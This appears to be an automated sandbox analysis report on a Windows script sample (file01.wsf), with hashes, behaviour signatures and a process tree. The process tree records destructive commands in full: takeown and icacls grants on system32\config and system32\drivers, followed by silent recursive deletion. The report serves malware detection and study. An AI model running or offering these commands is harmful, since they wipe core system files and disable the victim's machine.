Analysis

max time kernel: 117s
max time network: 118s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 15-08-2024 21:41
Static task: static1
Behavioral task: behavioral1
Sample: file01.wsf
Resource: win7-20240708-en
General

Target: file01.wsf
Size: 3KB
MD5: fefe72db31bfdbe4a0ae7f11cb852008
SHA1: a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256: d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512: a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
Malware Config

Signatures

Possible privilege escalation attempt (4 IoCs)
Processes:
  pid   process
  2892  takeown.exe
  2648  takeown.exe
  2508  icacls.exe
  1644  icacls.exe

Modifies file permissions (1 TTPs, 4 IoCs)
Processes:
  pid   process
  2892  takeown.exe
  2648  takeown.exe
  2508  icacls.exe
  1644  icacls.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description                       pid   process
  Token: SeTakeOwnershipPrivilege   2648  takeown.exe

Suspicious use of WriteProcessMemory (21 IoCs)
Processes:
  description                        pid   process      target process
  PID 2156 wrote to memory of 2384   2156  cmd.exe      WScript.exe
  PID 2156 wrote to memory of 2384   2156  cmd.exe      WScript.exe
  PID 2156 wrote to memory of 2384   2156  cmd.exe      WScript.exe
  PID 2384 wrote to memory of 2736   2384  WScript.exe  cmd.exe
  PID 2384 wrote to memory of 2736   2384  WScript.exe  cmd.exe
  PID 2384 wrote to memory of 2736   2384  WScript.exe  cmd.exe
  PID 2384 wrote to memory of 2812   2384  WScript.exe  cmd.exe
  PID 2384 wrote to memory of 2812   2384  WScript.exe  cmd.exe
  PID 2384 wrote to memory of 2812   2384  WScript.exe  cmd.exe
  PID 2736 wrote to memory of 2892   2736  cmd.exe      takeown.exe
  PID 2736 wrote to memory of 2892   2736  cmd.exe      takeown.exe
  PID 2736 wrote to memory of 2892   2736  cmd.exe      takeown.exe
  PID 2812 wrote to memory of 2648   2812  cmd.exe      takeown.exe
  PID 2812 wrote to memory of 2648   2812  cmd.exe      takeown.exe
  PID 2812 wrote to memory of 2648   2812  cmd.exe      takeown.exe
  PID 2736 wrote to memory of 2508   2736  cmd.exe      icacls.exe
  PID 2736 wrote to memory of 2508   2736  cmd.exe      icacls.exe
  PID 2736 wrote to memory of 2508   2736  cmd.exe      icacls.exe
  PID 2812 wrote to memory of 1644   2812  cmd.exe      icacls.exe
  PID 2812 wrote to memory of 1644   2812  cmd.exe      icacls.exe
  PID 2812 wrote to memory of 1644   2812  cmd.exe      icacls.exe
Processes

[1] C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"
    PID: 2156
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"
      PID: 2384
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        PID: 2736
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          PID: 2892
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          PID: 2508
          - Possible privilege escalation attempt
          - Modifies file permissions

    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        PID: 2812
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          PID: 2648
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          PID: 1644
          - Possible privilege escalation attempt
          - Modifies file permissions

[1] C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T
    PID: 1540
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 3KB
MD5: fefe72db31bfdbe4a0ae7f11cb852008
SHA1: a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256: d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512: a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

Filesize: 79B
MD5: 355d25ae00d82afebe47bffcaa713a40
SHA1: c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA256: 93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA512: 08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa

Filesize: 2B
MD5: 81051bcc2cf1bedf378224b0a93e2877
SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d